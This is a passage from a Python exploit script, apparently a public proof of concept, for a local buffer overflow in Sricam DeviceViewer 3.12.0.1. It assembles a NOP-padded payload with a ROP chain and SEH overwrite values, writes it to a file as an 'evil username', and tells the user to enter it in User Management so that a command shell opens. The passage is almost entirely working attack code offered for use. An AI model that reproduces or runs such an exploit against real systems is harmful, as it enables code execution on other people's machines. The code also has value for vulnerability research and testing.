payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000

print("Exploit Length: " + str(len(payload)))

try:
    fname = "exprop.txt"
    exploit = open(fname,"w")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
except:
    print("[!] Error creating the file")